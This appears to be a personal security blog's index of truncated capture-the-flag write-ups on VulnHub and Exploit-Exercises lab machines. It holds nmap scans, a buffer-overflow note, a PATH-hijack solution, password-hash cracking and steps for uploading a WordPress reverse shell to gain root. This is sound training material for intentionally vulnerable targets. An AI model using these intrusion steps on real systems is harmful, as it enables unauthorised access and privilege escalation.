Security Journal

Now i'll start doing something different from now on. Instead of presenting the whole solution, i'll write what really learnt about the machine i'm hacking. Cause that's more important for me than just presenting to you the complete write-up, which you can find in every corner of the internet. Much appreciated. Let's start: in this machine, i learn how to find inside the binary it's functions using objdump. But first i look for the strings - and i found execv, which led me to search for functions inside the binary: -d = means disassemble -M = machine architecture After seeing that, i use gdb and breakpoint it in main; i run it, and did disas spawn : I had to confirm if ASRL is enable, it's not. So all address will stay in their places, won't have any changes! So i build a file with that address in the picture above: You need 72 char and the address: Can you see 000055555555447d0? This is the first address of spawn function. Let's run ...

This machine was nice. I learnt something new: remote file inclusion. There are many examples on google. Google it. Let's start: # Nmap 7.60 scan initiated Sun Feb 18 12:37:05 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.23 Nmap scan report for 10.0.2.23 Host is up (0.00014s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: PwnLab Intranet Image Hosting 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 37405/udp status |_ 100024 1 49755/tcp status 3306/tcp open mysql MySQL 5.5.47-0+deb8u1 | mysql-info: | Protocol: 10 | Version: 5.5.47-0+deb8u1 | Thread ID: 38 | Capabilities flags: 63487 | Some Capabilities: Support41Auth, ConnectWithDatabase, LongPassword, SupportsL...

This Machine was not easy. I had to have a little patience. Cause, when you think you're going to some place, you're not. It got me trolled all the time. Let's start: # Nmap 7.60 scan initiated Sat Feb 24 11:50:53 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.10 Nmap scan report for 10.0.2.10 Host is up (0.00017s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.2.21 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2...

This machine was cool, it was hard. It took many hours to solve this. Let's start: # Nmap 7.60 scan initiated Fri Mar 16 20:11:28 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.31 Nmap scan report for 10.0.2.31 Host is up (0.00014s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5b 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 4 disallowed entries | /login.php /dev_shell.php /lat_memo.html |_/passwords.html |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Site doesn't have a title (text/html). 25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0) | ssh-hostkey: | 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA) | 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA) |_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (EdDSA) MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:l...

This Vm is cool. They always are. Let's start: # Nmap 7.60 scan initiated Tue Feb 20 16:04:52 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.24 Nmap scan report for 10.0.2.24 Host is up (0.00021s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) | ssh-hostkey: | 2048 d0:6a:10:e0:fb:63:22:be:09:96:0b:71:6a:60:ad:1a (RSA) | 256 ac:2c:11:1e:e2:d6:26:ea:58:c4:3e:2d:3e:1e:dd:96 (ECDSA) |_ 256 13:b3:db:c5:af:62:c2:b1:60:7d:2f:48:ef:c3:13:fc (EdDSA) 80/tcp open http nginx 1.10.3 |_http-server-header: nginx/1.10.3 |_http-title: Welcome to nginx! 31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3) | http-robots.txt: 3 disallowed entries |_/.bashrc /.profile /taxes |_http-server-header: Werkzeug/0.11.15 Python/3.5.3 |_http-title: 404 Not Found MAC Address: 08:00:27:EC:98:F3 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection pe...

This vm was hard to find the first solution, but it was cool. # Nmap 7.60 scan initiated Sat Feb 17 20:04:07 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.20 Nmap scan report for 10.0.2.20 Host is up (0.00019s latency). Not shown: 65523 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 aa:c3:9e:80:b4:81:15:dd:60:d5:08:ba:3f:e0:af:08 (DSA) | 2048 41:7f:c2:5d:d5:3a:68:e4:c5:d9:cc:60:06:76:93:a5 (RSA) | 256 ef:2d:65:85:f8:3a:85:c2:33:0b:7d:f9:c8:92:22:03 (ECDSA) |_ 256 ca:36:3c:32:e6:24:f9:b7:b4:d4:1d:fc:c0:da:10:96 (EdDSA) 53/tcp open domain ISC BIND 9.9.5-3-Ubuntu | dns-nsid: |_ bind.version: 9.9.5-3-Ubuntu 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_Hackers |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 110/tcp open pop3 Dovecot pop3d |_p...

This Machine is trully nice. I've saw before a drupal painel. I'm wordpress user, but i've never seen before. Let's go: # Nmap 7.60 scan initiated Sat Feb 17 18:25:25 2018 as: nmap -sV -sC -p- -oN nmap.txt 10.0.2.6 Nmap scan report for 10.0.2.6 Host is up (0.00031s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: La fraude fiscale des grandes soci\xC3\xA9t\xC3\xA9s | l'imp\xC3\xB4t que les pa... MAC Address: 08:00:27:F6:2F:97 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https:...

This Vm seems easy, but it's not. First of all, nmap, which show only apache open: # Nmap 7.25BETA2 scan initiated Mon Feb 12 10:41:15 2018 as: nmap -p- -sC -sV -oN nmap.txt 10.0.2.17 Nmap scan report for 10.0.2.17 Host is up (0.00038s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: SpyderSec | Challenge MAC Address: 08:00:27:56:11:10 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Feb 12 10:43:49 2018 -- 1 IP address (1 host up) scanned in 154.36 seconds After that, i run dirb, nothing uselful too: DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Feb 15 13:16:34 2018 URL_BASE: http://10.0.2.17/ WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt ----------------- GENERATED WORDS: 20458 ...

This exercise WAS TRULY useful when i was solving some CTF, like these: Touhid , Ew-skuzzy and NullByte About There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01. Solution cp /bin/getflag echo chmod 777 echo export PATH=.:${PATH} /home/flag01/flag01

This vm was really cool. Learn a lot. Shall we begin? # Nmap 7.25BETA2 scan initiated Wed Feb 14 09:44:05 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.12 Nmap scan report for 10.0.2.12 Host is up (0.00017s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Null Byte 00 - level 1 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 36739/tcp status |_ 100024 1 52615/udp status 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 1024 16:30:13:d9:d5:55:36:e8:1b:b7:d9:ba:55:2f:d7:44 (DSA) | 2048 29:aa:7d:2e:60:8b:a6:a1:c2:bd:7c:c8:bd:3c:f4:f2 (RSA) |_ 256 60:06:e3:64:8f:8a:6f:a7:74:5a:8b:3f:e1:24:93:96 (ECDSA) MAC Address: 08:00:27:FE:89:AF (Oracle VirtualBox virtual NIC) ...

This vm was awesome. It was cool cause i had to remember some concepts about file inclusion. First of all, this vm took a lot of time: it was difficult and i had to install two tools, one of them was not a requirement at all. Let's begin! # Nmap 7.25BETA2 scan initiated Mon Feb 12 19:17:00 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.18 Nmap scan report for 10.0.2.18 Host is up (0.00015s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA) |_ 256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA) 80/tcp open http nginx |_http-server-header: nginx |_http-title: Welcome! 3260/tcp open iscsi? |_iscsi-info: ERROR: Script execution failed (use -d to debug) MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection perf...

Extremly easy machine. Check for robots.txt - you're going to find /wordpress/ Check wordpress for default things, like admin:admin Upload your rvshell - by using a plugin or changing a file like header.php. Access the machine. $ pwd pwd /var/www/wordpress/ $ cat wp-config.php $ su - root su - root Password: rootpassword! root@Quaoar:~# ls ls flag.txt vmware-tools-distrib root@Quaoar:~# cat fl cat flag.txt 8e3f9ec016e3598c5eec11fd3d73f6fb

This machine was cool. I liked it. Let's start: i used to netdiscover to find out the ipaddress, which was 10.0.2.13. And nmap, i can see ssh and apache in 8008: # Nmap 7.25BETA2 scan initiated Sat Feb 10 11:07:17 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.13 Nmap scan report for 10.0.2.13 Host is up (0.00018s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |_ 256 21:fe:63:45:2c:cb:a1:f1:b6:ba:36:dd:ed:d3:d9:48 (ECDSA) 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 26 disallowed entries (15 shown) | /rkfpuzrahngvat/ /slgqvasbiohwbu/ /tmhrwbtcjpixcv/ | /vojtydvelrkzex/ /wpkuzewfmslafy/ /xqlvafxgntmbgz/ /yrmwbgyhouncha/ | /zsnxchzipvodib/ /atoydiajqwpejc/ /bupzejbkrxqfkd/ /cvqafkclsyrgle/ |_/unisxcudkqjydw/ /dwrbgldmtzshmf/ /exschmenuating/ /fytdinfovbujoh/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: HackDay Albania 2...

This exercise was really important to solve a problem of CTF( Capture the Flag) in vulnhub. About The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. If you look into this link , you're gonna see that the password is the second parameter in /etc/passwd Solution cat /etc/passwd | grep flag06 decrypt file with john in kalilinux ( hello ) You're going to use this information, that passwd can store passwords, in this Albania vm. .

This is machine is based on TV series with the same name. I didn't know that,but i had to know a little bit about the show. You're gonna know why. Let's start: First all, as always, nmap: # Nmap 7.25BETA2 scan initiated Fri Feb 9 20:23:22 2018 as: nmap -sC -sV -oN nmap.txt 10.0.2.16 Nmap scan report for 10.0.2.16 Host is up (0.00035s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 MAC Address: 08:00:27:23:51:A8 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Feb ...

This one was interesting for me. The ipaddress, i already knew, so no netdiscover was necessary. Nmap gave me only port 80 to work with. Nothing fancy, i know. But i think this was the right path to get into this machine. This machine was interesting, cause, i believe, worked on concept which was new to me - security through obscurity. It had a hidden url, that cannot not be seen by dirb nor nikto. The file robots.txt only send me to pages which contained only an image. Very funny, though. After trying everything, i found out this url frist. This url had an admin portal. If run curl , you're going to find an image in base64, which can be decode here - this is a password ( keKkeKKeKKeKkEkkEk ). And you're going to see the user in commentary, which is eezeepz. At least, you think it's the user, and you're right. No one goes: I left some junk here to make testing eaiser. By eezeepz . Something similar happend in Bulldog-1 . The guy left a commentary with the pa...

I didn't develop it, but i find truly usefull in order to convert address to hex ( Address2hex.py ). I was coding to protostart, and it helped me a lot. These two videos below will show you what is little ending. It's usefull to know that when we're talking about writing exploits user@protostar:~$ python address2hex.py 08048424 RET address: 08048424 Converted reverseHex value: \x24\x84\x04\x08

Today, i decided to do something different. I remember a long time a go, i saw this website Exploit-Exercise . I though it would be cool to solve those problems, cause i could see those problems on other vulhub machines, i was right. But, first of all, to make things easy: you have to access this machine with ssh, in order to have proper terminal to work on: ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key Now you can go in. ssh level00@ipaddress . Password: level00. First exercise: This level requires you to find a Set User ID program that will run as the “flag00” account. First of all, what it set user ID - or suid, as i came to learn later?! This video below you give you a start on that subject: To sum it up: it's a permission that you have to run script as another user. But, when it comes to binaries like C program, this can be dangerous: this could lead to privilege escalation. Another great example is this: If you can, give the authors thumb up on youtube, ...

This one, zico2-1,210 was truly interesting, with a little more effort than first time, i could get to the flag. Let's start: netdiscover -r 10.0.2.4/24 Currently scanning: Finished! | Screen View: Unique Hosts 4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 10.0.2.1 52:54:00:12:35:00 1 60 Unknown vendor 10.0.2.2 52:54:00:12:35:00 1 60 Unknown vendor ...